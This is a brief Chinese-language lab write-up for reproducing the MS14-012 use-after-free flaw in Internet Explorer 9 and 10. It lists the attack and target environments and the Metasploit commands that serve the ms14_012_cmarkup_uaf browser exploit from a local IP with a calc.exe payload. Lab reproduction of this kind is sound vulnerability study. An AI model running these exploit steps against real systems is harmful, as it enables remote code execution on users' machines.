Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10
allows remote attackers to execute arbitrary code via vectors involving
crafted JavaScript code, CMarkup, and the onpropertychange attribute of a
script element, as exploited in the wild in January and February 2014.
攻击机操作系统:Windows 10
目标机操作系统:Windows 7 sp1 32位
浏览器:IE10.0.9200.16438
FLASH版本: Flashplayer12
调试器: IDA、x64dbg
其他工具:Metasploit
Metasploit开启HTTP服务器:
攻击机cmd中输入ipconfig查询本机ip为192.168.1.101
攻击机cmd打开metasploit控制台启动攻击所需的HTTP服务器
使用的命令如下:
1. msfconsole 2. use exploit/windows/browser/ms14_012_cmarkup_uaf 3. set SRVHOST 192.168.1.101 4. set payload windows/exec 5. set CMD calc.exe 6. exploit